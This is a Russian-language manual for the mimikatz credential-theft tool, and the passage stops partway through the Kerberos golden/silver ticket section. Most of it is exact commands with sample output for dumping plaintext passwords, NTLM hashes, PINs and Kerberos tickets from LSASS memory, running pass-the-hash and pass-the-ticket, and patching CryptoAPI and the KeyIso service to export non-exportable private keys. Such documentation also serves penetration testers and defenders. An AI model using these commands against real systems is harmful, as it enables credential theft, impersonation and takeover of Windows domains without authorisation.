mimikatz

Описание mimikatz

Программа mimikatz хорошо известна за возможность извлекать пароли в виде простого текста, хеши, ПИН коды и билеты kerberos из памяти. mimikatz также может выполнять pass-the-hash, pass-the-ticket или строить Golden тикеты.

mimikatz поставляется в двух версиях: x64 и Win32, в зависимости от версии вашей Windows (32/64 бита).

Версия Win32 не имеет доступа в память 64-битных процессов (как lsass), но может открывать 32 битные minidump в 64-битной Windows.

Некоторые операции требуют административных привилегий или маркера SYSTEM, так что будьте в курсе UAC от версии Vista.

Домашняя страница: https://github.com/gentilkiwi/mimikatz

Автор: Benjamin DELPY

Лицензия: CC BY 4.0

Справка по mimikatz

Использование:

.\mimikatz.exe

У программы нет опций, всё управление осуществляется в интерактивной консоли.

Руководство по mimikatz

Страница man отсутствует.

После запуска mimikatz:

приглашение командной строки сменится на:

mimikatz #

Теперь вы можете печатать инструкции, такие как exit, cls, crypto::certificates

Инструкции должны быть в форме ИМЯ_МОДУЛЯ::ИМЯ_КОМАНДЫ АРГУМЕНТЫ…, к примеру:

  • kerberos::tgt
  • crypto::certificates /systemstore:local_machine /store:my /export
  • cls

Дополнительная информация о командах дана в описании модулей.

Команды из стандартного модуля можно печатать без имени модуля. То есть cls это то же самое, что и standard::cls.

Для выхода из mimikatz используйте команду exit.

Строка команды

Вы можете передать инструкции в строку команды mimikatz, те из них, которые имеют аргументы/пробелы должны быть помещены в кавычки.

./mimikatz log version "crypto::certificates /systemstore:local_machine" exit

На экране инструкции из строки команды помечаются строкой (commandline).

Доступные модули:

Модули mimikatz

Модуль standard

Это главный модуль mimikatz, ог содержит быстрые команды для взаимодействия с инструментом.

Только команды этого модуля не нужно предварять именем модуля (но это также работает), то есть exit это то же самое, что и standard::exit.

Команды этого модуля: exit, cls, answer, coffe, sleep, log, base64, version, cd

exit

Выход из mimikatz, после очистки процедур.

exit
Bye!

cls

Очищает экран заполняя окно консоли пробелами.

cls

Примечание: это не работает с удалённо выполняемыми инструментами вроде psexec, meterpreter или других.

sleep

Сон в течение определённого количества миллисекунд (по умолчанию 1000 миллисекунд).

Аргументы:

число — необязательно — количество миллисекунд для сна (по умолчанию это 1000)

sleep
Sleep : 1000 ms... End !
sleep 4200
Sleep : 4200 ms... End !

log

Ведёт журнал всего вывода в файл (по умолчанию в mimikatz.log).

Аргументы:

имя файла — опционально — имя файла для журнала

/stop — опционально — остановить запись журнала в файл

log
Using 'mimikatz.log' for logfile : OK
log other.log
Using 'other.log' for logfile : OK
log /stop
Using '(null)' for logfile : OK

base64

Переключается от записи файла на диск на вывод в Base64.

base64
isBase64Intercept was    : false
isBase64Intercept is now : true

mimikatz # kerberos::list /export

[00000000] - 17
   Start/End/MaxRenew: 24/04/2014 08:24:20 ; 24/04/2014 18:17:29 ; 01/05/2014 08:17:29
   Server Name       : krbtgt/CHOCOLATE.LOCAL @ CHOCOLATE.LOCAL
   Client Name       : Administrateur @ CHOCOLATE.LOCAL
   Flags 60a00000    : pre_authent ; renewable ; forwarded ; forwardable ;
====================
Base64 of file : 0-60a00000-Administrateur@krbtgt~CHOCOLATE.LOCAL-CHOCOLATE.LOCAL.kirbi
====================
doIFOTCCBTWgAwIBBaEDAgEWooIELjCCBCphggQmMIIEIqADAgEFoREbD0NIT0NP
TEFURS5MT0NBTKIkMCKgAwIBAqEbMBkbBmtyYnRndBsPQ0hPQ09MQVRFLkxPQ0FM
...
GA8yMDE0MDQyNDIyNTE0NFqnERgPMjAxNDA1MDExMjUxNDRaqBEbD0NIT0NPTEFU
RS5MT0NBTKkkMCKgAwIBAqEbMBkbBmtyYnRndBsPQ0hPQ09MQVRFLkxPQ0FM
====================

   * Saved to file     : 0-60a00000-Administrateur@krbtgt~CHOCOLATE.LOCAL-CHOCOLATE.LOCAL.kirbi

Примечание: команды, которые хотят записать файл на диск, будут думать, что они записывают на диск (они сообщают, что файлы записаны на диск).

version

Показать версию mimikatz и Windows

version
mimikatz 2.2.0 (arch x64)
Windows NT 10.0 build 18362 (arch x64)
msvc 150030729 207

Обозначения компиляторов

  • 150030729 207 это WinDDK компилятор
  • 150030729 1 это vc90 компилятор (Visual Studio 2008)
  • 160040219 1 это vc100 компилятор (Visual Studio 2010)
  • 170061030 0 это vc110(_xp) компилятор (Visual Studio 2012)
  • 180040629 0 это vc120(_xp) компилятор (Visual Studio 2013)
  • 190023026 0 это vc140(_xp) компилятор (Visual Studio 2015)

cd

Изменяет или показывает текущую директорию.

Аргумент:

директория — опциональный — директория, в которую вы хотите перейти

cd
C:\Users\MiAl\Downloads\mimikatz_trunk\x64
cd x:\vm
Old: C:\security\mimikatz\mimikatz
New: x:\vm

Модуль privilege

debug

Этот модуль обеспечивает некоторые команды для манипулирования привилегиями в процессе mimikatz.

Спрашивает привилегии debug для процесса mimikatz.

Привилегия отладки позволяет кому-то отлаживать процесс, к которому у него не было бы доступа. Например, процесс, выполняющийся как пользователь с включённой привилегией отладки на своём токене, может отлаживать службу, работающую как локальная система.

из: http://msdn.microsoft.com/library/windows/hardware/ff541528.aspx

privilege::debug
Privilege '20' OK

Примечание: ошибка ERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege (20) c0000061 означает, что запрашиваемая привилегия не имеется у клиента (обычно это происходит если вы не администратор).

Модуль crypto

Этот модуль, один из старейших, играет с функциями CryptoAPI. В своей осове это маленькая certutil, которая извлекает выгоду из подмены токенов, пропатчивания устаревших функций CryptoAPI и патча службы изоляции ключей CNG.

Команды: providers, stores, sc, scauth, certificates, keys, capi, cng

providers

Эта команда выводит список всех провайдеров: CryptoAPI, затем, если доступно, CNG (NT 6).

crypto::providers

Вывод:

CryptoAPI providers :
 0. RSA_FULL      ( 1)   - Microsoft Base Cryptographic Provider v1.0
 1. DSS_DH        (13)   - Microsoft Base DSS and Diffie-Hellman Cryptographic Provider
 2. DSS           ( 3)   - Microsoft Base DSS Cryptographic Provider
 3. RSA_FULL      ( 1) H - Microsoft Base Smart Card Crypto Provider
 4. DH_SCHANNEL   (18)   - Microsoft DH SChannel Cryptographic Provider
 5. RSA_FULL      ( 1)   - Microsoft Enhanced Cryptographic Provider v1.0
 6. DSS_DH        (13)   - Microsoft Enhanced DSS and Diffie-Hellman Cryptographic Provider
 7. RSA_AES       (24)   - Microsoft Enhanced RSA and AES Cryptographic Provider
 8. RSA_SCHANNEL  (12)   - Microsoft RSA SChannel Cryptographic Provider
 9. RSA_FULL      ( 1)   - Microsoft Strong Cryptographic Provider

CryptoAPI provider types:
 0. RSA_FULL      ( 1) - RSA Full (Signature and Key Exchange)
 1. DSS           ( 3) - DSS Signature
 2. RSA_SCHANNEL  (12) - RSA SChannel
 3. DSS_DH        (13) - DSS Signature with Diffie-Hellman Key Exchange
 4. DH_SCHANNEL   (18) - Diffie-Hellman SChannel
 5. RSA_AES       (24) - RSA Full and AES

CNG providers :
 0. Microsoft Key Protection Provider
 1. Microsoft Passport Key Storage Provider
 2. Microsoft Platform Crypto Provider
 3. Microsoft Primitive Provider
 4. Microsoft Smart Card Key Storage Provider
 5. Microsoft Software Key Storage Provider
 6. Microsoft SSL Protocol Provider
 7. Windows Client Key Protection Provider

stores

Эта команда выводит список хранилищ в системном хранилище.

Аргументы:

/systemstore — опционально — системное хранилище, которое должно использоваться для вывода списка хранилищ (по умолчанию: CERT_SYSTEM_STORE_CURRENT_USER)

Им может быть один из:

CERT_SYSTEM_STORE_CURRENT_USER или CURRENT_USER

CERT_SYSTEM_STORE_CURRENT_USER_GROUP_POLICY или USER_GROUP_POLICY

CERT_SYSTEM_STORE_LOCAL_MACHINE или LOCAL_MACHINE

CERT_SYSTEM_STORE_LOCAL_MACHINE_GROUP_POLICY или LOCAL_MACHINE_GROUP_POLICY

CERT_SYSTEM_STORE_LOCAL_MACHINE_ENTERPRISE или LOCAL_MACHINE_ENTERPRISE

CERT_SYSTEM_STORE_CURRENT_SERVICE или CURRENT_SERVICE

CERT_SYSTEM_STORE_USERS или USERS

CERT_SYSTEM_STORE_SERVICES или SERVICES

crypto::stores /systemstore:local_machine

Пример вывода:

Asking for System Store 'local_machine' (0x00020000)
 0. My
 1. Root
 2. Trust
 3. CA
 4. TrustedPublisher
 5. Disallowed
 6. AuthRoot
 7. TrustedPeople
 8. ClientAuthIssuer
 9. FlightRoot
10. TestSignRoot
11. eSIM Certification Authorities
12. Homegroup Machine Certificates
13. SmartCardRoot
14. TrustedAppRoot
15. TrustedDevices
16. Windows Live ID Token Issuer

sc

Эта команда выводит список смарт-карт, ридеров токенов внутри или снаружи системы. Когда доступна CSP, эта команда пытается получить список ключей на смарт-карте.

crypto::sc

Пример вывода:

SmartCard readers:

 * OMNIKEY CardMan 3x21 0
    ATR  : 3bb794008131fe6553504b32339000d1
    Model: G&D SPK 2.3 T=1
    CSP  : SafeSign Standard Cryptographic Service Provider

 0. 34C99D73A1FAE4D44F9966DF626623DF18858C83
    34C99D73A1FAE4D44F9966DF626623DF18858C83
        Type           : AT_KEYEXCHANGE (0x00000001)
        Exportable key : NO
        Key size       : 1024

 * SCM Microsystems Inc. SCR35xx USB Smart Card Reader 0

scauth

Эта команда создаёт клиентские сертификаты для аутентификации смарт-картами, подписанные Центром Сертификации.

Аргументы:

/caname — название субъекта центра сертификации (нужно для подписки сертификата)

/castore — опционально — системное хранилище, которое содержит центр сертификации (по умолчанию: CERT_SYSTEM_STORE_LOCAL_MACHINE)

/upn — User Principal Name (UPN) targetted (например: user@lab.local)

/pfx — опционально — имя файла для сохранения окончательного сертификата (по умолчанию: нет файла, хранится в CERT_SYSTEM_STORE_CURRENT_USER)

crypto::scauth /caname:KiwiAC /upn:user@lab.local /pfx:user.pfx

Пример вывода:

CA store       : LOCAL_MACHINE
CA name        : KiwiAC
CA validity    : 22/08/2016 22:00:36 -> 22/08/2021 22:10:35
Certificate UPN: user@lab.local
Key container  : {a1bd29ec-4203-4aac-8159-40f28f96335b}
Key provider   : Microsoft Enhanced Cryptographic Provider v1.0
Private Export : user.pfx - OK

certificates

Эта команда выводит список сертификатов и свойств их ключей. Она также может экспортировать сертификаты.

Аргументы:

/systemstore — опционально — системное хранилище, которое должно использоваться (по умолчанию: CERT_SYSTEM_STORE_CURRENT_USER)

/store — опционально — хранилище, которое необходимо использовать для перечисления/экспорта сертификатов (по умолчанию: My) — полный список по crypto::stores

/export — опционально — экспортировать все сертификаты в файлы (публичная часть в DER, приватная часть в PFX файлы — защищены паролем: mimikatz)

/silent — опционально — если потребуется пользовательское взаимодействие, то прервать

/nokey — опционально — не пытаться взаимодействовать с приватными ключами

crypto::capi
Local CryptoAPI patched

privilege::debug
Privilege '20' OK

crypto::cng
"KeyIso" service patched

crypto::certificates /systemstore:local_machine /store:my /export
 * System Store  : 'local_machine' (0x00020000)
 * Store         : 'my'

 0. example.domain.local
        Key Container  : example.domain.local
        Provider       : Microsoft Software Key Storage Provider
        Type           : CNG Key (0xffffffff)
        Exportable key : NO
        Key size       : 2048
        Public export  : OK - 'local_machine_my_0_example.domain.local.der'
        Private export : OK - 'local_machine_my_0_example.domain.local.pfx'

Примечания:

  • Смотрите crypto::stores для списка правильных systemstore и её вывод для списка store.
  • Ключи, которые не экспортируются (с KO - ERROR kuhl_m_crypto_exportCert ; Export / CreateFile (0x8009000b)) часто могут быть экспортированы с crypto::capi и/или crypto::cng
  • Не смотря на crypto::capi или crypto::cng патч, вы должны иметь правильный ACL на файловой системе для доступа к приватным ключам (UAC…)
  • Некоторые провайдеры шифрования криптокарт могут сообщить об успешном экспорти приватных ключай (не, конечно, это не так)

keys

Эта команда выводит список ключей по провайдеру. Она также может экспортировать ключи.

Аргументы:

/provider — опционально — устаревший провайдер CryptoAPI (по умолчанию: MS_ENHANCED_PROV)

/providertype — опционально — устаревший тип провайдера CryptoAPI (по умолчанию: PROV_RSA_FULL)

/cngprovider — опционально — провайдер CNG (по умолчанию: Microsoft Software Key Storage Provider)

/export — опционально — экспортировать все ключи в файлы PVK

/silent — опционально — если требуется участие пользователя, то прервать работу

Для полного списка подробностей о провайдерах смотрите crypto::providers

crypto::keys /export

Пример вывода:

 * Store         : 'user'
 * Provider      : 'MS_ENHANCED_PROV' ('Microsoft Enhanced Cryptographic Provider v1.0')
 * Provider type : 'PROV_RSA_FULL' (1)
 * CNG Provider  : 'Microsoft Software Key Storage Provider'

CryptoAPI keys :
    0. {EC035D5F-8FD1-E7D8-AAAD-C86FB54E3A9B}
    842c81480124efb5c28c9b15393e0c4a_3f5e4e39-f6d5-458f-b36e-cb1e452f682f
        Type           : AT_KEYEXCHANGE (0x00000001)
        |Provider name : Microsoft Enhanced Cryptographic Provider v1.0
        |Key Container : {EC035D5F-8FD1-E7D8-AAAD-C86FB54E3A9B}
        |Unique name   : 842c81480124efb5c28c9b15393e0c4a_3f5e4e39-f6d5-458f-b36e-cb1e452f682f
        |Implementation: CRYPT_IMPL_SOFTWARE ;
        Algorithm      : CALG_RSA_KEYX
        Key size       : 384 (0x00000180)
        Key permissions: 0000003b ( CRYPT_ENCRYPT ; CRYPT_DECRYPT ; CRYPT_READ ; CRYPT_WRITE ; CRYPT_MAC ; )
        Exportable key : NO
        Private export : OK - 'user_capi_0_{EC035D5F-8FD1-E7D8-AAAD-C86FB54E3A9B}.keyx.rsa.pvk'

    1. MiAl
    f80bab9a230f13b50db1f07b347246aa_3f5e4e39-f6d5-458f-b36e-cb1e452f682f
ERROR kuhl_m_crypto_l_keys_capi ; CryptGetUserKey (0x8009000d)


CNG keys :
    0. Microsoft Connected Devices Platform device certificate
        |Provider name : Microsoft Software Key Storage Provider
        |Implementation: NCRYPT_IMPL_SOFTWARE_FLAG ;
        Key Container  : Microsoft Connected Devices Platform device certificate
        Unique name    : de7cf8a7901d2ad13e5c67c29e5d1662_3f5e4e39-f6d5-458f-b36e-cb1e452f682f
        Algorithm      : ECDSA_P256
        Key size       : 256 (0x00000100)
        Export policy  : 00000003 ( NCRYPT_ALLOW_EXPORT_FLAG ; NCRYPT_ALLOW_PLAINTEXT_EXPORT_FLAG ; )
        Exportable key : YES
        LSA isolation  : NO
        Private export : OK - 'user_cng_0_Microsoft Connected Devices Platform device certificate.dsa.ec.p8k'

Примечания:

  • Если нужно, вы можете конвертировать PVK файлы командой:
openssl rsa -inform pvk -in key.pvk -outform pem -out key.pem

capi

Этот патч модифицирует функцию CryptoAPI, в процессе mimikatz, чтобы сделать неэкпортируемые ключи экспортируемыми (специфичных прав, кроме доступа к приватным ключам, не требуется).

Это только полезно когда используется один из провайдеров ключей:

  • Microsoft Base Cryptographic Provider v1.0
  • Microsoft Enhanced Cryptographic Provider v1.0
  • Microsoft Enhanced RSA and AES Cryptographic Provider
  • Microsoft RSA SChannel Cryptographic Provider
  • Microsoft Strong Cryptographic Provider

Может использоваться с crypto::certificates и crypto::keys

crypto::capi
Local CryptoAPI patched

cng

Этот патч модифицирует службу KeyIso, в процессе LSASS, чтобы сделать неэкпортируемые ключи экспортируемыми.

Это полезно только когда провайдером ключей является Microsoft Software Key Storage Provider (вам не нужно патчить CNG для других провайдеров).

Может использоваться с crypto::certificates и crypto::keys

privilege::debug
Privilege '20' OK

crypto::cng
"KeyIso" service patched

Модуль sekurlsa

Этот модуль извлекает пароли, ключи, пинкоды, тикеты по умолчанию из памяти процесса lsass (Local Security Authority Subsystem Service) или делает его minidump (смотрите https://github.com/gentilkiwi/mimikatz/wiki/howto-~-get-passwords-by-memory-dump).

При работе с процессом lsass, mimikatz нужны некоторые права, выберите из:

  • Administrator, для получения привилегий debug через privilege::debug
  • Аккаунт SYSTEM, через инструменты последующей эксплуатации, расписания задач, psexec -s … - в этом случае привилегии debug не нужны.

Без прав на доступ к процессу lsass, все команды потерпят неудачу с примерно такой ошибкой: ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005) (кроме как при работе с minidump).

Поэтому перед другими командами выполните:

privilege::debug
Privilege '20' OK

log sekurlsa.log
Using 'sekurlsa.log' for logfile : OK

Информация, которую можно извлечь, зависит от версии Windows и методов аутентификации.

Начиная с Windows 8.x и 10, по умолчанию, в памяти нет паролей.

Исключения:

  • Когда DC недоступны, провайдер kerberos хранить пароли для будущих переговоров;
  • Когда HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest, UseLogonCredential (DWORD) установлена на 1, провайдер wdigest хранит пароли;
  • Когда значения Allow* в HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Credssp\PolicyDefaults или HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CredentialsDelegation, провайдер tspkgs / CredSSP хранит пароли.

Но, конечно, не когда используется Credential Guard.

Команды: logonpasswords, pth, tickets, ekeys, dpapi, minidump, process, searchpasswords, msv, wdigest, kerberos, tspkg, livessp, ssp, credman

logonpasswords

Выводит список учётных данных все доступных провайдеров.

sekurlsa::logonpasswords

Пример вывода:

Authentication Id : 0 ; 88038 (00000000:000157e6)
Session           : Interactive from 1
User Name         : Gentil Kiwi
Domain            : vm-w7-ult
SID               : S-1-5-21-2044528444-627255920-3055224092-1000
        msv :
         [00000003] Primary
         * Username : Gentil Kiwi
         * Domain   : vm-w7-ult
         * LM       : d0e9aee149655a6075e4540af1f22d3b
         * NTLM     : cc36cf7a8514893efccd332446158b1a
         * SHA1     : a299912f3dc7cf0023aef8e4361abfc03e9a8c30
        tspkg :
         * Username : Gentil Kiwi
         * Domain   : vm-w7-ult
         * Password : waza1234/
        wdigest :
         * Username : Gentil Kiwi
         * Domain   : vm-w7-ult
         * Password : waza1234/
        kerberos :
         * Username : Gentil Kiwi
         * Domain   : vm-w7-ult
         * Password : waza1234/
        ssp :
         [00000000]
         * Username : admin
         * Domain   : nas
         * Password : anotherpassword
        credman :
         [00000000]
         * Username : nas\admin
         * Domain   : nas.chocolate.local
         * Password : anotherpassword

pth

Pass-The-Hash

mimikatz может выполнить известную операцию 'Pass-The-Hash' для запуска процесса под другими учётными данными с хешем NTLM пользовательского пароля вместо его реального пароля.

Для этого программа запускает процесс с поддельной идентификацией, затем заменяет фальшивую информацию (NTLM хеш фальшивого пароля) на реальную информацию (NTLM хеш реального пароля).

Аргументы:

/user — имя пользователя, кем вы хотите притвориться, помните, что Administrator это не единственное имя для этого общеизвестного аккаунта. Например, в русскоязычной версии Windows этот пользователь имеет имя Администратор.

/domain — полное доменное имя — без домена или в случае локального пользователя/администратора, используйте имя компьютера или сервера, рабочую группу или что-то ещё.

/rc4 или /ntlm — опционально — ключ RC4 / NTLM хеш пароля пользователя

/aes128 — опционально — ключ AES128, полученный из пароля пользователя и области домена.

/aes256 — опционально — ключ AES256, полученный из пароля пользователя и области домена.

/run — опционально — команда для запуска — по умолчанию это: cmd для получения шелла.

sekurlsa::pth /user:Administrateur /domain:chocolate.local /ntlm:cc36cf7a8514893efccd332446158b1a

Пример вывода:

user    : Administrateur
domain  : chocolate.local
program : cmd.exe
NTLM    : cc36cf7a8514893efccd332446158b1a
  |  PID  712
  |  TID  300
  |  LUID 0 ; 362544 (00000000:00058830)
  \_ msv1_0   - data copy @ 000F8AF4 : OK !
  \_ kerberos - data copy @ 000E23B8
   \_ rc4_hmac_nt       OK
   \_ rc4_hmac_old      OK
   \_ rc4_md4           OK
   \_ des_cbc_md5       -> null
   \_ des_cbc_crc       -> null
   \_ rc4_hmac_nt_exp   OK
   \_ rc4_hmac_old_exp  OK
   \_ *Password replace -> null

Также работает на Windows последних версий:

  • sekurlsa::pth /user:Administrateur /domain:chocolate.local /aes256:b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9
  • sekurlsa::pth /user:Administrateur /domain:chocolate.local /ntlm:cc36cf7a8514893efccd332446158b1a /aes256:b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9

Примечания:

  • эта команда не работает с минидампами;
  • она требует повышенных привилегий (privilege::debug или аккаунт SYSTEM), в отличии от 'Pass-The-Ticket', который использует официальный API;
  • эта новая версия 'Pass-The-Hash' заменяет ключи RC4 Kerberos хешем ntlm (и/или заменяет AES ключи) — она разрешает провайдеру Kerberos спрашивать тикеты TGT!
  • хеш ntlm является обязательным на XP/2003/Vista/2008 и до 7/2008r2/8/2012 kb2871997 (AES недоступен или заменяем) ;
  • ключи AES могут быть заменены только на 8.1/2012r2 или 7/2008r2/8/2012 с kb2871997, в этом случае вы можете избежать ntlm хеш.

Смотрите также:

  • Pass-The-Ticket: kerberos::ptt
  • Golden Ticket: kerberos::golden

tickets

Выводит список и экспортирует тикеты Kerberos всех сессий.

В отличии от kerberos::list, sekurlsa использует чтение памяти и не подпадает под ограничения экспорта ключей. sekurlsa может иметь доступ к тикетам других сессиям (пользователям).

Аргумент:

/export — опциональный — тикеты экспортируются в файлы .kirbi. Они начинаются с LUID пользователя и номера группы (0 = TGS, 1 = тикет клиента(?) и 2 = TGT)

sekurlsa::tickets /export

Пример вывода:

Authentication Id : 0 ; 541043 (00000000:00084173)
Session           : Interactive from 2
User Name         : Administrateur
Domain            : CHOCOLATE
SID               : S-1-5-21-130452501-2365100805-3685010670-500

	 * Username : Administrateur
	 * Domain   : CHOCOLATE.LOCAL
	 * Password : (null)

	Group 0 - Ticket Granting Service
	 [00000000]
	   Start/End/MaxRenew: 11/05/2014 16:47:59 ; 12/05/2014 02:47:58 ; 18/05/2014 16:47:58
	   Service Name (02) : ldap ; srvcharly.chocolate.local ; @ CHOCOLATE.LOCAL
	   Target Name  (02) : ldap ; srvcharly.chocolate.local ; @ CHOCOLATE.LOCAL
	   Client Name  (01) : Administrateur ; @ CHOCOLATE.LOCAL
	   Flags 40a50000    : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ; 
	   Session Key       : 0x00000012 - aes256_hmac      
	     d0195b657e63cdec73f32bf44d36bb12a62c928de6db9964b5a87c55721f8d04
	   Ticket            : 0x00000012 - aes256_hmac       ; kvno = 5	[...]
	   * Saved to file [0;84173]-0-0-40a50000-Administrateur@ldap-srvcharly.chocolate.local.kirbi !
	 [00000001]
	   Start/End/MaxRenew: 11/05/2014 16:47:59 ; 12/05/2014 02:47:58 ; 18/05/2014 16:47:58
	   Service Name (02) : LDAP ; srvcharly.chocolate.local ; chocolate.local ; @ CHOCOLATE.LOCAL
	   Target Name  (02) : LDAP ; srvcharly.chocolate.local ; chocolate.local ; @ CHOCOLATE.LOCAL
	   Client Name  (01) : Administrateur ; @ CHOCOLATE.LOCAL ( CHOCOLATE.LOCAL )
	   Flags 40a50000    : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ; 
	   Session Key       : 0x00000012 - aes256_hmac      
	     60cedabb5c3e2874131e9770c2d858fdec0342acf8c8787771d7c4475ace0392
	   Ticket            : 0x00000012 - aes256_hmac       ; kvno = 5	[...]
	   * Saved to file [0;84173]-0-1-40a50000-Administrateur@LDAP-srvcharly.chocolate.local.kirbi !

	Group 1 - Client Ticket ?

	Group 2 - Ticket Granting Ticket
	 [00000000]
	   Start/End/MaxRenew: 11/05/2014 16:47:58 ; 12/05/2014 02:47:58 ; 18/05/2014 16:47:58
	   Service Name (02) : krbtgt ; CHOCOLATE.LOCAL ; @ CHOCOLATE.LOCAL
	   Target Name  (02) : krbtgt ; CHOCOLATE.LOCAL ; @ CHOCOLATE.LOCAL
	   Client Name  (01) : Administrateur ; @ CHOCOLATE.LOCAL ( CHOCOLATE.LOCAL )
	   Flags 40e10000    : name_canonicalize ; pre_authent ; initial ; renewable ; forwardable ; 
	   Session Key       : 0x00000012 - aes256_hmac      
	     4b42cce01deffbfb0e67efc18c993bb52601848763aecf322030329cd1882e4c
	   Ticket            : 0x00000012 - aes256_hmac       ; kvno = 2	[...]
	   * Saved to file [0;84173]-2-0-40e10000-Administrateur@krbtgt-CHOCOLATE.LOCAL.kirbi !

Смотрите также:

  • Pass-The-Ticket: kerberos::ptt
  • Golden Ticket: kerberos::golden

ekeys

Вывести список ключей шифрования Kerberos.

sekurlsa::ekeys

Пример вывода:

Authentication Id : 0 ; 541043 (00000000:00084173)
Session           : Interactive from 2
User Name         : Administrateur
Domain            : CHOCOLATE
SID               : S-1-5-21-130452501-2365100805-3685010670-500

         * Username : Administrateur
         * Domain   : CHOCOLATE.LOCAL
         * Password : (null)
         * Key List :
           aes256_hmac       b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9
           rc4_hmac_nt       cc36cf7a8514893efccd332446158b1a
           rc4_hmac_old      cc36cf7a8514893efccd332446158b1a
           rc4_md4           cc36cf7a8514893efccd332446158b1a
           rc4_hmac_nt_exp   cc36cf7a8514893efccd332446158b1a
           rc4_hmac_old_exp  cc36cf7a8514893efccd332446158b1a

dpapi

Вывод списка кэшированных мастер-ключей.

sekurlsa::dpapi

Пример вывода:

Authentication Id : 0 ; 251812 (00000000:0003d7a4)
Session           : Interactive from 1
User Name         : Administrateur
Domain            : CHOCOLATE
SID               : S-1-5-21-130452501-2365100805-3685010670-500
         [00000000]
         * GUID :       {62f69fd3-0a99-4531-bf94-7442fdf1e411}
         * Time :       01/05/2014 13:12:39
         * Key :        8801bde168af739ab81aa32b79aa0ee4c27cb9c0dc94b6ab0a8516e650b4bdd565110ae1040d3e47add422454d92b307276bebdba7b23b2b2f8005066ede3580

minidump

Переключиться (или повторно инициироваться) в контекст минидампа LSASS.

Переключение на минидамп из файла lsass.dmp

sekurlsa::minidump lsass.dmp
Switch to MINIDUMP : 'lsass.dmp'

Извлечение паролей:

sekurlsa::logonpasswords

Пример вывода:

Opening : 'lsass.dmp' file for minidump...

Authentication Id : 0 ; 88038 (00000000:000157e6)
Session           : Interactive from 1
User Name         : Gentil Kiwi
Domain            : vm-w7-ult
SID               : S-1-5-21-2044528444-627255920-3055224092-1000
        msv :
         [00000003] Primary
         * Username : Gentil Kiwi
         * Domain   : vm-w7-ult
         * LM       : d0e9aee149655a6075e4540af1f22d3b
         * NTLM     : cc36cf7a8514893efccd332446158b1a
         * SHA1     : a299912f3dc7cf0023aef8e4361abfc03e9a8c30
...

Примечания:

Dump из Наботает на
NT 5 - x86 NT 5 - x86
NT 5 - x64 NT 5 - x64
NT 6 - x86 NT 6 - x86/x64 (mimikatz x86)
NT 6 - x64 NT 6 - x64

Некоторые ошибки:

  • ERROR kuhl_m_sekurlsa_acquireLSA ; Minidump pInfos->MajorVersion (A) != MIMIKATZ_NT_MAJOR_VERSION (B)
    Вы пытаетесь открыть минидамп из Windows NT другой мажоной версии (NT5 vs NT6).
  • ERROR kuhl_m_sekurlsa_acquireLSA ; Minidump pInfos->ProcessorArchitecture (A) != PROCESSOR_ARCHITECTURE_xxx (B)
    Вы пытаетесь открыть минидамп из Windows NT другой архитектуры (x86 vs x64).
  • ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000002)
    Файл минидампа не найден (проверьте путь).

process

Переключиться (повторно инициировать) на контекст процесса LSASS.

searchpasswords

Не документирована. Возможно, эта команда удалена.

msv

Выводит список учётных данных LM и NTLM.

sekurlsa::msv

Пример вывода:

Authentication Id : 0 ; 3518063 (00000000:0035ae6f)
Session           : Unlock from 1
User Name         : Administrateur
Domain            : CHOCOLATE
SID               : S-1-5-21-130452501-2365100805-3685010670-500
        msv :
         [00010000] CredentialKeys
         * RootKey  : 2a099891174e2d700d44368255a53a1a0e360471343c1ad580d57989bba09a14
         * DPAPI    : 43d7b788389b67ee3bcac1786f01a75f

Authentication Id : 0 ; 3463053 (00000000:0034d78d)
Session           : Interactive from 2
User Name         : utilisateur
Domain            : CHOCOLATE
SID               : S-1-5-21-130452501-2365100805-3685010670-1107
        msv :
         [00010000] CredentialKeys
         * NTLM     : 8e3a18d453ec2450c321003772d678d5
         * SHA1     : 90bbad2741ee9c533eb8eb37f8fb4172b8896ffa
         [00000003] Primary
         * Username : utilisateur
         * Domain   : CHOCOLATE
         * LM       : 00000000000000000000000000000000
         * NTLM     : 8e3a18d453ec2450c321003772d678d5
         * SHA1     : 90bbad2741ee9c533eb8eb37f8fb4172b8896ffa

wdigest

Выводит список учётных данных WDigest.

kerberos

Когда используется смарт-карта (smartcard) для вхоада на домен, lsass кэширует ПИН код этой смарт-карты.

sekurlsa::kerberos

Пример вывода:

[...]
        kerberos :
         * Username : Administrateur
         * Domain   : CHOCOLATE.LOCAL
         * Password : (null)
         * PIN code : 1234

tspkg

Выводит список учётных данных Lists TsPkg.

livessp

Выводит список учётных данных LiveSSP.

ssp

Выводит список учётных данных SSP.

credman

Выводит список учётных данных Credentials Manager.

trust

Эта команда не документирована.

krbtgt

Эта команда не документирована.

backupkeys

Предпочтительные резервные мастер-ключи/

dpapisystem

Секрет DPAPI_SYSTEM.

Модуль kerberos

Этот модуль может использоваться без каких-либо привилегий. Он разрешает играться с официальными Microsoft Kerberos API — http://msdn.microsoft.com/library/windows/desktop/aa378099.aspx — и создавать офлайн 'Golden tickets' (Золотые билеты), долго действующие TGT тикеты для любых пользователей.

Больше информации: [fr] http://1drv.ms/1fuEU28

Команды: ptt, golden / silver, list, tgt, purge

ptt

Pass-The-Ticket

Внедряет один или несколько тикетов Kerberos в текущую сессию (TGT или TGS).

Аргументы:

имя файла — имя файла тикета (может быть несколько)

директория — путь до директории, все файл .kirbi будут внедрены.

kerberos::ptt Administrateur@krbtgt-CHOCOLATE.LOCAL.kirbi

Пример вывода:

Ticket 'Administrateur@krbtgt-CHOCOLATE.LOCAL.kirbi' successfully submitted for current session

Примечание: если используется с тикетами не из mimikatz, то тикеты должны быть в формате учётных данных Kerberos (KRB_CRED) - http://tools.ietf.org/html/rfc4120#section-5.8

Смотрите также:

golden / silver

Эта команда создаёт тикеты Kerberos, TGT или TGS с произвольными данными, для любого пользователя, какого вы хотите, в группах, которых вы хотите… (например: администратор домена).

Аргументы:

Общие:

/domain — полностью определённое доменное имя (например: chocolate.local).

